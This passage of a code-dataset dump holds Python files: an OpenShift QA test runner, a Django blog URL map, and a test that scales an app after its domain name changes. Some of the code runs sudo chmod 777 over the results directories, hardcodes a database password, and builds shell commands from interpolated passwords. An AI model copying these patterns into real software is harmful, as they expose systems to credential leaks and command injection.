action=\"store_true\", dest=\"TCMS\", help=\"Enable storing to TCMS database\")\n parser.add_option(\"-s\", action=\"store_true\", dest=\"START_SERVER\", help=\"start an devenv instance automatically by default\")\n parser.add_option(\"-t\", dest=\"testcase_id\", help=\"Test Case ID\")\n (options, args) = parser.parse_args()\n \n \n print \"*\"*80\n print args\n print \"*\"*80\n return (options, args)\n\n\nclass TestRunner(object):\n def __init__(self, config):\n self._config = config\n self.lasturl = None\n rdb = config.get(\"resultsdirbase\", \"/var/tmp\")\n config.resultsdir = rdb # default when not running a test.\n\n def get_config(self):\n return self._config\n \n def initialize(self):\n runtime_config(self._config)\n self._config.resultsfiles = []\n\n\n def __call__(self, argv):\n \"\"\"\n this function is called whenever an instance object is called.\n ex. tr = TestRunner(cf); \n \"\"\"\n cf = self._config\n self.initialize()\n (options, args) = config_parser()\n cf['options'] = options\n cf['args'] = args\n \n if options.tag:\n cf['tcms_tag'] = options.tag\n\n # XXX perhaps save the arguemnts for future use??\n \n # get the os.envirn variables and save it into cf \n cf.OPENSHIFT_http_proxy = os.getenv('OPENSHIFT_http_proxy')\n cf.OPENSHIFT_user_email = os.getenv('OPENSHIFT_user_email')\n cf.OPENSHIFT_user_passwd = os.getenv('OPENSHIFT_user_passwd')\n cf.argv = args\n cf.arguments = [os.path.basename(argv[0])] + argv[1:]\n return self.run_modules(cf.argv)\n\n def get_module(self, name):\n if sys.modules.has_key(name):\n return sys.modules[name]\n mod = __import__(name)\n\n try:\n mod = __import__(name)\n components = name.split('.')\n for comp in components[1:]:\n mod = getattr(mod, comp)\n except ImportError:\n print >>sys.stderr, \"*** Import error in test module %s \" % (name,)\n return None\n else:\n return mod\n \n def run_module(self, mod):\n \n cf = self._config\n userinterface = storage.get_ui(cf)\n cf['userinterface'] = userinterface\n\n # ui = self._config.userinterface\n user_name = commands.getoutput('whoami')\n cf['user'] = user_name\n output = commands.getoutput(\"groups %s\" % user_name)\n user_group = output.split(':')[0].strip()\n cf.USERGROUP = user_group\n if type(mod) is str:\n mod = self.get_module(mod)\n # find out what type of test this is. 
if UI, then we need to instantiate\n # a AutoWeb instance\n cf['mod_type'] = mod.__name__.split('.')[0]\n\n if cf.options.tag:\n # user wants to run a collection of test (a testsuite, instantiate \n # a TCMS object, which will be used to add_test()\n cf['tcms_obj'] = tcms_base.TCMS()\n\n if mod:\n cf.reportbasename = mod.__name__.replace(\".\", \"_\")\n cf.logbasename = \"%s.log\" % (cf.reportbasename,)\n cf['logfile'] = storage.get_logfile(cf)\n # merge any test-module specific configuration files\n modconf = os.path.join(os.path.dirname(mod.__file__), \"%s.conf\" % (mod.__name__.split(\".\")[-1],))\n user_modconf = modconf + \".\" + cf.OPENSHIFT_user_email\n if os.path.exists(user_modconf):\n execfile(user_modconf, cf.__dict__)\n elif os.path.exists(modconf):\n execfile(modconf, cf.__dict__)\n\n\n try:\n print \"tcms_testcaserun_id: %s\" %(cf.tcms_testcaserun_id)\n if os.environ.has_key(\"OPENSHIFT_tcms_testcaserun_id\"):\n cf.tcms_testcaserun_id = os.environ['OPENSHIFT_tcms_testcaserun_id']\n except:\n #if rhtest is run manually from command line without launcher, which should put this into the .conf file\n cf.tcms_testcaserun_id = None\n #print \"WARN: None tcms_testcaserun_id info!!!\"\n\n\n if cf.tcms_testcaserun_id != None:\n import tcms\n cf['tcms_obj'] = tcms.TCMS()\n else:\n cf['tcms_obj'] = None\n\n\n starttime = timelib.now()\n cf.results_year_month_dir = os.path.join(cf.resultsdirbase, \"%s\" % (timelib.strftime(\"%Y%m/%d/\")))\n # first make the YYYYMM top directory\n try:\n os.system(\"sudo mkdir -p %s\" % (cf.results_year_month_dir))\n os.system(\"sudo find %s -type d -exec chmod 777 {} \\;\" % (cf.resultsdirbase))\n except OSError, errno:\n if errno[0] == EEXIST:\n pass\n else:\n raise\n\n rand_num = random.randint(0, 5000)\n # now make the actual test directory, added rand_num to make it more unique\n cf.resultsdir = os.path.join(\n cf.results_year_month_dir,\n \"%s-%s-%s\" % (cf.reportbasename, rand_num, timelib.strftime(\"%Y%m%d%H%M%S\", timelib.localtime(starttime)))\n )\n try:\n os.system(\"sudo mkdir -p %s\" % (cf.resultsdir))\n os.system(\"sudo find %s -type d -exec chmod 777 {} \\;\" % (cf.resultsdirbase))\n except OSError, errno:\n if errno[0] == EEXIST:\n pass\n else:\n raise\n\n rpt = storage.get_report(cf)\n cf['report'] = rpt\n cf['logfilename'] = storage.get_logfilename(cf)\n cf.reportfilenames = rpt.filenames # Report file's names. 
save for future use.\n rpt.initialize()\n rpt.logfile(cf.logfilename)\n rpt.add_title(\"Test Results for module %r.\" % (mod.__name__, ))\n rpt.add_message(\"ARGUMENTS\", \" \".join(cf.arguments))\n # get the build version XXX git of the test itself or the dev\n # number?\n version_file = None #build_version\n self.rpt = rpt # new report object.\n try:\n vf = open(version_file)\n build_info = vf.readlines()[0].strip() # Should be the first line\n rpt.add_message(\"BUILD_INFO\", build_info)\n except:\n #self.info(\"Error: Can't open %s!\" % version_file)\n pass\n # insert the _ID if it exists.\n try: \n rpt.add_message(\"File ID\", mod._ID)\n except:\n rpt.add_message(\"File ID\", 'Missing')\n\n rpt.add_message(\"Platform\", \" \".join(platform.uname()))\n try:\n rpt.add_message(\"Host\", socket.gethostbyname(socket.gethostname()))\n except:\n rpt.add_message(\"Host\", socket.gethostname())\n rpt.add_message(\"RHC client version\", cmd_get_status_output(\"rhc --version\", quiet=True)[1])\n rpt.add_message(\"Python version\", cmd_get_status_output(\"python --version\", quiet=True)[1])\n rpt.add_message(\"Ruby version\", cmd_get_status_output(\"ruby --version\", quiet=True)[1])\n\n\n note = cf.options.notes\n if note:\n rpt.add_message(\"NOTE\", note)\n self._config.comment = note\n else:\n self._config.comment = None\n self.lasturl = url = self._reporturl(rpt)\n self._config['results_url'] = url\n rpt.add_message(\"MODULESTART\", timelib.strftime(\"%a, %d %b %Y %H:%M:%S %Z\", timelib.localtime(starttime)))\n\n suite = mod.get_suite(cf)\n self.test_name = self._config.test_name\n ui = cf.userinterface\n aws = aws_console.AWS_Console()\n ami_info = None\n # get ami, and image label information\n if not cf.options.instance_ip:\n ui.info(\"No instance IP specified, starting new DEV instance...\")\n image_dict = aws.get_all_devenv_images()\n target_image = image_dict[max(sorted(image_dict))]\n image_name = target_image.name.split('/')[1]\n\n ui.info(\"User did not specify an ami or devenv name, using the latest '%s':'%s'\" % (image_name, target_image.id))\n rpt.info(\"User did not specify an ami or devenv name, using the latest '%s':'%s'\" % (image_name, target_image.id))\n if cf.options.instance_name is None:\n import uuid\n cf.options.instance_name = \"QE_%s_%s\" %(image_name, uuid.uuid1().hex[:6])\n \n node =aws.create_node(cf.options.instance_name, target_image, 'm1.medium')\n cf['node'] = node # save it for later reference if need be.\n instance_ip = node.public_ip[0]\n ami_id = node.extra['imageId']\n else:\n instance_ip = cf.options.instance_ip\n \"\"\"\n if (instance_ip == 'localhost') or (instance_ip == '127.0.0.1'):\n ### live CD \n cf['live_cd'] = True\n build_info = 'live_cd'\n ami_id = build_info\n build_version = build_info\n\n else:\n cf['live_cd'] = False\n ui.info(\"Getting ami id for '%s'\" % instance_ip)\n if instance_ip == 'stg.openshift.redhat.com':\n ami_info = database.get_stg_ami()\n ami_id = ami_info.ami_id\n build_version = ami_info.build_version\n else:\n ami_id = aws_console.get_ami(instance_ip)\n \"\"\"\n \"\"\"\n #ami_id = 'ami-1ef82a77'\n ami_info = None\n if ami_info is None:\n try:\n # first query to db to find the build information.\n ami_info = database.get_ami_info(ami_id)\n build_version = ami_info.build_version\n ui.info(\"Found AMI information '%s' matching '%s'\" % (ami_id, build_version))\n except:\n try:\n ui.error(\"Can't find AMI information from mysql database, trying aws console...\")\n image = aws.get_image(ami_id)\n build_version = 
image.name.split('/')[1]\n except:\n build_version = 'Unknown'\n ui.error(\"Can't find AMI information, putting in '%s'\" % build_version)\n \"\"\"\n ami_id = 'Unknown'\n build_version = 'Unknown'\n instance_info = {}\n instance_info['ami_id'] = ami_id\n try:\n rpt.add_message(\"AMI ID\", aws_console.get_ami(instance_ip))\n except:\n rpt.add_message(\"AMI ID\", ami_id)\n instance_info['build_version'] = build_version\n instance_info['ip'] = instance_ip\n cf['instance_info'] = instance_info\n cf['logger'] = rhtest.RhTestLogger(cf.userinterface, cf.report)\n rest = openshift.Openshift(host=instance_ip,\n user=cf.OPENSHIFT_user_email,\n passwd=cf.OPENSHIFT_user_passwd,\n logger=cf.logger)\n cf['rest_api'] = rest # get a rest handle for the instance\n\n if cf.mod_type == 'UI':\n import autoweb\n cf['web'] = autoweb.AutoWeb(ip=cf.instance_info['ip'], proxy=cf.proxy, config=cf)\n # user sepecified to record result into TCMS\n if cf.options.TCMS:\n if not cf.has_key('tcms_obj'):\n tcms = tcms_base.TCMS()\n cf['tcms_obj'] = tcms\n else:\n if cf.tcms_obj is None:\n cf.tcms_obj = tcms_base.TCMS()\n tcms = cf.tcms_obj \n tcms = cf.tcms_obj\n # get the build id from TCMS\n build_version = cf.instance_info['build_version']\n if cf.options.notes:\n summary = cf.options.notes\n else:\n timestamp = time.strftime(\"%Y_%m_%d-%H:%M:%S\", time.localtime())\n if cf.options.tag:\n run_tag = cf.options.tag\n else:\n run_tag = cf.test_name\n\n summary = \"_\".join([timestamp, run_tag])\n #tcms.check_and_insert_build(cf.instance_info['build_version'])\n #res = tcms.get_testcase_id_by_script_name(mod.__name__)\n tests = suite.get_tests()\n \n if tests[0].inst.__module__ == 'Collections.RunTests':\n # If the module is called Collections.RunTests, then skip it\n # because that is just a \n tests = tests[1:]\n \n testcase_ids, testcases_dict = tcms.get_testcase_ids(tests)\n cf.testcases = testcases_dict # save it for reference later\n # create testcases_variants dictionary\n cf.testcase_variants_map = tcms.get_variants_mapping(testcase_ids) \n #self.info(\"xxx\", 1)\n res = tcms.create_testrun(testcase_ids, build_version, summary)\n #res = tcms.create_testrun_from_script(mod.__name__,\n # build_version)\n # XXX hardcode this during developement \n #res = [{'case': 'demo-1', 'build_id': 1770, 'tested_by_id': None, 'environment_id': 0, 'run': 'TestRun create via XML-RPC', 'run_id': 33116, 'notes': '', 'sortkey': None, 'running_date': None, 'assignee': None, 'build': 'unspecified', 'case_id': 128833, 'is_current': False, 'case_run_status': 'IDLE', 'assignee_id': None, 'case_run_id': 849475, 'tested_by': None, 'case_text_version': 1, 'case_run_status_id': 1, 'close_date': None}]\n cf['testrun_res'] = res\n ui.info(\"TCMS testrun created, case_id: %s, run_id: %s\" % (res[0]['case_run_id'], res[0]['run_id']))\n ui.info(\"Running a total of %s tests\" % (len(testcase_ids)))\n rpt.info(\"TCMS testrun created, case_id: %s, run_id: %s\" % (res[0]['case_run_id'], res[0]['run_id']))\n rpt.info(\"Running a total of %s tests\" % (len(testcase_ids)))\n # get the testcase id from TCMS based on the script name.\n\n rv = suite() # just run instance of the suite\n suite_total_run_time = \"%.2f seconds\" % cf.total_time\n rpt.add_message(\"SUITETIME\", suite_total_run_time)\n rpt.add_message(\"MODULEEND\", timelib.localtimestamp())\n rpt.finalize()\n\n # lastly, run the module-level finalize function.\n if hasattr(mod, \"finalize\") and callable(mod.finalize):\n if cf.options.DEBUG:\n try:\n mod.finalize(cf)\n except:\n ex, val, tb = 
sys.exc_info()\n import debugger\n debugger.post_mortem(ex, val, tb)\n else:\n mod.finalize(cf)\n if cf.has_key('node'):\n ui.info(\"Terminating node...\")\n aws.stop_node(cf.node.name)\n\n #close browser window\n if cf.mod_type == 'UI':\n try:\n cf['web'].driver.close()\n except:\n pass\n\n # force close of report and logfile between modules\n lfname = cf.logfile.name\n cf.logfile.flush()\n cf.logfile.close()\n del cf.report ; del cf.logfile\n # \n if cf.options.RECORD:\n # scp the log directory to the master central machine\n myscp = pscp.Pscp(host=cf.HOST, user='root')\n src = cf.resultsdir\n dst = os.path.dirname(cf.resultsdir)\n myscp.copy_to(src, dst)\n # the results are then cp over to the mount drive, so now we have two copies of the HTML log\n if cf.options.GLOBAL_RECORD:\n remote_dst = os.path.dirname(cf.global_logs_basepath + src.split('/var/www/html')[1])\n #print '##############'\n #print \"SRC: %s\" % src\n #print \"DST: %s\" % remote_dst\n myscp.copy_to_global_location(src, remote_dst)\n #myscp.copy_to_global_location(src, remote_dst+'/')\n\n else:\n print \"Log files not copied to remote host to save disk space!\"\n\n if (cf.options.DEBUG and cf.options.VERBOSE):\n # now put log file in results dir\n shutil.copy(lfname, cf.resultsdir)\n\n\n # tell user where to look for files\n ui = cf.userinterface\n if cf.options.RECORD:\n ui.Print(\"Results location: %s\" % (url,))\n if cf.options.GLOBAL_RECORD:\n global_results_url = cf.global_logs_baseurl + src.split('/var/www/html')[1]\n ui.Print(\"Results location: %s\" % (global_results_url,))\n else:\n ui.Print(\"Results location: %s\" % (cf.resultsdir))\n\n #if (cf.options.TCMS):\n #self.update_loglink(cf.resultsdir, cf.options.testcase_id) #always do update\n\n # Adding comments to TCMS in the end of testing\n if cf.tcms_testcaserun_id != None:\n if cf.options.RECORD:\n if cf.options.GLOBAL_RECORD:\n comments = global_results_url\n else:\n comments = url\n try:\n cf['tcms_obj'].update_testcaserun_comments(cf.tcms_testcaserun_id, comments)\n cf['tcms_obj'].update_testcaserun_testlog(cf.tcms_testcaserun_id, \"Logs\", comments)\n except Exception as e:\n print \"ERROR: Unable to update comments: %s\"%str(e)\n else:\n print \"No log file is saved\"\n\n \"\"\"\n if cf.flags.has_key('EMAIL'):\n # email the results back to whomever started the test.\n if cf.get('cc'):\n recipients = cf.cc.split(\",\")\n else:\n recipients = None\n print \"cc: %s \" % recipients\n e_rpt = reports.Email.EmailReport(\"text/plain\", recipients)\n e_rpt.initialize()\n e_rpt.add_title(\"Test result notification\")\n e_rpt.info(url)\n e_rpt.finalize()\n else:\n print (\"Results not emailed out\") \n \"\"\"\n return rv\n\n def update_loglink(self, loglink, testcase_id):\n ### HARDCODED - THIS IS TEMPORARY - \n loglink = '/'.join([\"http://10.14.16.138\", loglink.split(\"/var/www/html/\")[1]])\n case_run_id = self._config.tcms_testcaserun_id\n if case_run_id is None:\n print \"ERROR: Missing tcms_testrun_id for updating testcaserun\"\n return\n try:\n #if os.getenv('OPENSHIFT_variant_testcase') == \"True\":\n # loglink = os.environ['OPENSHIFT_test_name'] + \"-: \" + loglink\n tcms_object = tcms.TCMS()\n #testrun_id = os.environ['OPENSHIFT_tcms_testrun_id']\n #testcaserun = tcms_object.get_testcaserun(testcase_id, testrun_id)\n #testcaserun = os.environ['OPENSHIFT_tcms_testcaserun_id']]\n \n #old_loglinks = testcaserun['notes']\n #if old_loglinks:\n # loglink += \" %s\" % old_loglinks\n tcms_object.update_testcaserun(case_run_id, {'notes':loglink})\n except 
Exception as e:\n print \"ERROR: Failed to update log link for test case run:%s\"%(str(e))\n\n def _reporturl(self, rpt):\n cf = self._config\n baseurl = cf.get(\"baseurl\")\n documentroot = cf.get(\"documentroot\")\n resultsdir = cf.resultsdir\n if baseurl and documentroot:\n url = baseurl+resultsdir[len(documentroot):]\n rpt.add_url(\"TESTRESULTS\", url)\n return url\n else:\n rpt.add_message(\"RESULTSDIR\", resultsdir)\n return resultsdir\n\n\n def run_modules(self, modlist):\n \"\"\"run_modules(modlist)\n Runs the run_module() function on the supplied list of modules (or module\n names). \n \"\"\"\n self._config['modlist'] = modlist\n rv =0\n for mod in modlist:\n rv += self.run_module(mod)\n # give things time to \"settle\" from previous suite. Some spawned\n # processes may delay exiting and hold open TCP ports, etc.\n time.sleep(2) \n return rv\n \ndef runtime_config(cf):\n \"\"\"\n connects to the database based on cf.DBURI, if the option --dburi is given\n then try to connect to the database specified by that command line option.\n Otherwise, use the default setting, which is 'localhost'\n \n \"\"\"\n if 'DBURI' in os.environ.keys():\n cf.DBURI = os.environ['DBURI']\n hostname = cf.get('DBURI')\n ##### \n if hostname is not None:\n dburi = 'mysql://ruser:lab@%s/%s' % (hostname, cf.TESTRESULTS_DBURI)\n cf.DBURI = dburi\n database.connect2db(cf.DBURI)\n\n\ndef get_testrunner(argv=None):\n global __testrunner\n #if __testrunner:\n __testrunner = TestRunner(argv or sys.argv)\n return __testrunner\n\ndef delete_testrunner():\n global __testrunner\n __testrunner = None\n\ndef runtest(argv):\n cf = storage.get_config()\n tr = TestRunner(cf)\n return tr(argv)\n\n\nif __name__ == '__main__':\n runtest(sys.argv)\n\n" }, { "alpha_fraction": 0.5849999785423279, "alphanum_fraction": 0.5862500071525574, "avg_line_length": 41.105262756347656, "blob_id": "278dfa958065a3a3c15687bfe32b4de368c3def9", "content_id": "6e10e62c0ad7493909c96b3a258ede9fb1346536", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 800, "license_type": "no_license", "max_line_length": 73, "num_lines": 19, "path": "/sblog/simpleblog/urls.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: utf-8-*-\n\nfrom django.conf.urls import patterns, url\n\n\nurlpatterns = patterns(('simpleblog.views'),\n url(r'^bloglist/$', 'blog_list', name='bloglist'),\n url(r'^blog/(?P<id>\\d+)/$', 'blog_show', name='detailblog'),\n url(r'^blog/tag/(?P<id>\\d+)/$', 'blog_filter', name='filtrblog'),\n url(r'^blog/search/$', 'blog_search', name='searchblog'),\n url(r'^blog/add/$', 'blog_add', name='addblog'),\n url(r'^blog/addmassage/$', 'add_weibo', name='addmassage'),\n url(r'^blog/showweibo/$', 'show_weibo', name='showweibo'),\n url(r'^blog/(?P<id>\\w+)/update/$', 'blog_update', name='updateblog'),\n url(r'^blog/(?P<id>\\w+)/del/$', 'blog_del', name='delblog'),\n url(r'^blog/(?P<id>\\d+)/commentshow/$', 'blog_show_comment', \n name='showcomment'),\n)\n" }, { "alpha_fraction": 0.4577777683734894, "alphanum_fraction": 0.4646635353565216, "avg_line_length": 49.71428680419922, "blob_id": "66ad5470fb2da147e9eb6ced2a3ea982629aa570", "content_id": "4229075db26791818d3d9176e3ca1f6b92ea8735", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15975, "license_type": "no_license", "max_line_length": 152, "num_lines": 315, "path": 
"/automation/open/testmodules/RT/scaling/scalable_app_after_altering_namespace.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\n2012-07-26\n\n[US2003,US2004,US2005,US2006,US2007,US2099][Runtime][cartridge]Scalable app after altering domain name\nhttps://tcms.engineering.redhat.com/case/147642/\n\"\"\"\nimport os\nimport re\nimport common\nimport OSConf\nimport rhtest\nimport time\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False # define to True if your test is interactive (takes user input).\n ITEST = ['DEV', 'INT', 'STG'] #this will be checked by framework\n WORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\n def initialize(self):\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"WARN: Missing variant, used `php` as default\")\n self.test_variant = 'php'\n self.summary = \"[US2003,US2004,US2005,US2006,US2007,US2099][Runtime][cartridge]Scalable app after altering domain name\"\n self.app_name = common.getRandomString(8)\n self.app_type = common.app_types[self.test_variant]\n self.git_repo = self.app_name\n self.record_count = 30 # amount of records to be inserted\n self.domain_name = common.get_domain_name()\n self.new_domain_name = common.getRandomString(10)\n common.env_setup()\n\n def finalize(self):\n try:\n common.alter_domain(self.domain_name, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd)\n except:\n pass\n\n\nclass ScalingAfterAlterDomain(OpenShiftTest):\n\n def test_method(self):\n self.step(\"Create scalable %s app: %s\" % (self.app_type, self.app_name))\n ret = common.create_app(self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True, \"./\", True)\n self.assert_equal(ret, 0, \"Failed to create scalable %s app: %s\" % (self.app_type, self.app_name))\n\n self.step(\"Embed mysql to the app\")\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Failed to embed mysql to the app\")\n\n self.step(\"Copy sample app to git repo and git push\")\n self.mysql_user = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"username\"]\n self.mysql_passwd = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"password\"]\n self.mysql_dbname = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"database\"]\n self.mysql_host = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"url\"]\n self.mysql_port = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"port\"]\n if self.test_variant in ('php'):\n cmd = (\"cd '%s/php/' \"\n \" && cp -f '%s/../cartridge/app_template/bigdata/mysql/mysql.php' . \"\n \" && sed -i -e 's/#host/%s/g' mysql.php && sed -i -e 's/#port/%s/g' mysql.php \"\n \" && sed -i -e 's/#dbname/%s/g' mysql.php \"\n \" && sed -i -e 's/#user/%s/g' mysql.php \"\n \" && sed -i -e 's/#passwd/%s/g' mysql.php \"\n \" && git add . 
&& git commit -amt \"\n \" && git push\") % (self.git_repo, \n OpenShiftTest.WORK_DIR, \n self.mysql_host, \n self.mysql_port, \n self.mysql_dbname, \n self.mysql_user, \n self.mysql_passwd)\n elif self.test_variant in ('jbossas', 'jbosseap', 'jbossews'):\n cmd = (\"cd '%s/src/main/webapp/' \"\n \" && cp -f '%s/../cartridge/app_template/bigdata/mysql/mysql.jsp' . \"\n \" && mkdir WEB-INF/lib \"\n \" && cp -f '%s/../cartridge/app_template/bigdata/mysql/mysql-connector-java-5.1.20-bin.jar' WEB-INF/lib \"\n \" && sed -i -e 's/#host/%s/g' mysql.jsp \"\n \" && sed -i -e 's/#port/%s/g' mysql.jsp \"\n \" && sed -i -e 's/#dbname/%s/g' mysql.jsp \"\n \" && sed -i -e 's/#user/%s/g' mysql.jsp \"\n \" && sed -i -e 's/#passwd/%s/g' mysql.jsp \"\n \" && git add . \"\n \" && git commit -amt \"\n \" && git push\") % (self.git_repo, \n OpenShiftTest.WORK_DIR, \n OpenShiftTest.WORK_DIR, \n self.mysql_host, \n self.mysql_port, \n self.mysql_dbname, \n self.mysql_user, \n self.mysql_passwd)\n elif self.test_variant in ('perl'):\n cmd = (\"cd '%s/perl/' \"\n \" && cp -f '%s/../cartridge/app_template/bigdata/mysql/mysql.pl' . \"\n \" && sed -i -e 's/#host/%s/g' mysql.pl && sed -i -e 's/#port/%s/g' mysql.pl \"\n \" && sed -i -e 's/#dbname/%s/g' mysql.pl \"\n \" && sed -i -e 's/#user/%s/g' mysql.pl \"\n \" && sed -i -e 's/#passwd/%s/g' mysql.pl \"\n \" && git add . \"\n \" && git commit -amt \"\n \" && git push\") % (self.git_repo, \n OpenShiftTest.WORK_DIR, \n self.mysql_host, \n self.mysql_port, \n self.mysql_dbname, \n self.mysql_user, \n self.mysql_passwd)\n elif self.test_variant in ('python'):\n cmd = (\"cd '%s/wsgi/' \"\n \" && cp -f '%s/../cartridge/app_template/bigdata/mysql/application' . \"\n \" && sed -i -e 's/#host/%s/g' application \"\n \" && sed -i -e 's/#port/%s/g' application \"\n \" && sed -i -e 's/#dbname/%s/g' application \"\n \" && sed -i -e 's/#user/%s/g' application \"\n \" && sed -i -e 's/#passwd/%s/g' application \"\n \" && git add . \"\n \" && git commit -amt \"\n \" && git push\") % (self.git_repo, \n OpenShiftTest.WORK_DIR, \n self.mysql_host, \n self.mysql_port, \n self.mysql_dbname, \n self.mysql_user, \n self.mysql_passwd)\n elif self.test_variant in ('ruby', 'ruby-1.9'):\n cmd = (\"cd '%s/' \"\n \" && cp -f %s/../cartridge/app_template/bigdata/mysql/{config.ru,Gemfile} . \"\n \" ; bundle check ; bundle install \"\n \" ; sed -i -e 's/#host/%s/g' config.ru \"\n \" && sed -i -e 's/#port/%s/g' config.ru \"\n \" && sed -i -e 's/#dbname/%s/g' config.ru \"\n \" && sed -i -e 's/#user/%s/g' config.ru \"\n \" && sed -i -e 's/#passwd/%s/g' config.ru \"\n \" && git add . 
\"\n \" && git commit -amt \"\n \" && git push\")% (self.git_repo, \n OpenShiftTest.WORK_DIR, \n self.mysql_host, \n self.mysql_port, \n self.mysql_dbname, \n self.mysql_user, \n self.mysql_passwd)\n (ret, output) = common.command_getstatusoutput(cmd)\n self.assert_equal(ret, 0, \"Failed to copy sample app to local git repo and git push\")\n\n\n ret = common.inject_app_index_with_env(self.app_name, self.app_type)\n self.assert_equal(ret, 0, \"Failed to inject app by ENV page\")\n\n self.step((\"Access the 'insert' page to insert a large amount \"\n \"of records into the mysql database\"))\n\n time.sleep(8)\n\n app_url=OSConf.get_app_url(self.app_name)\n if self.test_variant in ('php'):\n url = \"%s/mysql.php?action=insert&size=%s\" % (app_url, \n self.record_count)\n elif self.test_variant in ('jbossas', 'jbosseap', 'jbossews'):\n url = \"%s/mysql.jsp?action=insert&size=%s\" % (app_url, \n self.record_count)\n elif self.test_variant in ('perl'):\n url = \"%s/mysql.pl?action=insert&size=%s\" % (app_url, \n self.record_count)\n elif self.test_variant in ('python'):\n url = \"%s/insert?size=%s\" % (app_url, self.record_count)\n elif self.test_variant in ('ruby', 'ruby-1.9'):\n url = \"%s/mysql?action=insert&size=%s\" % (app_url, \n self.record_count)\n\n cmd = 'curl -H \"Pragma:no-cache\" -L \"%s\"' % (url)\n ret = common.command_get_status(cmd)\n\n time.sleep(4)\n\n self.step(\"Check mysql data exists\")\n if self.test_variant in ('php'):\n url = \"%s/mysql.php?action=show\" % (app_url)\n elif self.test_variant in ('jbossas', 'jbosseap', 'jbossews'):\n url = \"%s/mysql.jsp?action=show\" % (app_url)\n elif self.test_variant in ('perl'):\n url = \"%s/mysql.pl?action=show\" % (app_url)\n elif self.test_variant in ('python'):\n url = \"%s/show\" % (app_url)\n elif self.test_variant in ('ruby', 'ruby-1.9'):\n url = \"%s/mysql?action=show\" % (app_url)\n ret = common.grep_web_page(url, \n [\"There are %s records in database\" % (self.record_count), \n (\"This is testing data for testing \"\n \"snapshoting and restoring big data\"\n \" in mysql database\")],\n '-H \"Pragma:no-cache\" -L', 5, 6, True)\n self.assert_equal(ret, 0, \"The MySQL data doesn't exist\")\n\n self.step(\"Scale up the app\")\n ret = common.scale_up(self.app_name, self.domain_name)\n self.assert_equal(ret, 0, \"Failed to scale up the app\")\n\n self.step(\"Verify scale up\")\n #gear_lst = self.verify_scale_up(url)\n gear_num = common.get_num_of_gears_by_web(self.app_name, self.app_type)\n self.assert_equal(gear_num, 2, \"Unable to verify scale up\")\n #self.assert_equal(len(gear_lst), 2, \n # \"Failed to veryfy scale up. 
%d gears found\" % (len(gear_lst)))\n\n self.step(\"Alter domain name\")\n ret = common.alter_domain(self.new_domain_name, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Failed to alter domain\")\n\n time.sleep(10)\n\n self.step(\"Modify domain name in program\")\n if self.test_variant in ('php'):\n cmd = (\"sed -i -e 's/-%s/-%s/g' %s/php/mysql.php \"\n \"%s/.git/config\") % (self.domain_name, \n self.new_domain_name, \n self.git_repo, \n self.git_repo)\n elif self.test_variant in ('jbossas', 'jbosseap', 'jbossews'):\n cmd = (\"sed -i -e 's/-%s/-%s/g' %s/src/main/webapp/mysql.jsp \"\n \" %s/.git/config\") % (self.domain_name, \n self.new_domain_name, \n self.git_repo, \n self.git_repo)\n elif self.test_variant in ('perl'):\n cmd = (\"sed -i -e 's/-%s/-%s/g' %s/perl/mysql.pl \"\n \" %s/.git/config\") % (self.domain_name, \n self.new_domain_name, \n self.git_repo, \n self.git_repo)\n elif self.test_variant in ('python'):\n cmd = (\"sed -i -e 's/-%s/-%s/g' %s/wsgi/application \"\n \" %s/.git/config\") % (self.domain_name, \n self.new_domain_name, \n self.git_repo, \n self.git_repo)\n elif self.test_variant in ('ruby', 'ruby-1.9'):\n cmd = (\"sed -i -e 's/-%s/-%s/g' \"\n \" %s/config.ru %s/.git/config\") % (self.domain_name, \n self.new_domain_name, \n self.git_repo, \n self.git_repo)\n cmd += \" && cd %s && git commit -amt && git push\" % (self.git_repo)\n ret = common.command_get_status(cmd)\n self.assert_equal(ret, 0, \"Failed to change the domain name in program\")\n\n self.step((\"Verify all gears(including mysql) works \"\n \"properly after altering domain\"))\n app_url = OSConf.get_app_url(self.app_name)\n if self.test_variant in ('php'):\n url = \"%s/mysql.php?action=show\" % (app_url)\n elif self.test_variant in ('jbossas', 'jbosseap'):\n url = \"%s/mysql.jsp?action=show\" % (app_url)\n elif self.test_variant in ('perl'):\n url = \"%s/mysql.pl?action=show\" % (app_url)\n elif self.test_variant in ('python'):\n url = \"%s/show\" % (app_url)\n elif self.test_variant in ('ruby', 'ruby-1.9'):\n url = \"%s/mysql?action=show\" % (app_url)\n ret = common.grep_web_page(url,\n [\"There are %s records in database\" % (self.record_count),\n (\"This is testing data for testing \"\n \"snapshoting and restoring big data\"\n \" in mysql database\")],\n '-H \"Pragma:no-cache\" -L', 5, 6, True)\n self.assert_equal(ret, 0, \"The MySQL data doesn't exist\")\n #gear_lst = self.verify_scale_up(url)\n #self.assert_equal(len(gear_lst), 2, \"Failed to veryfy scale up. 
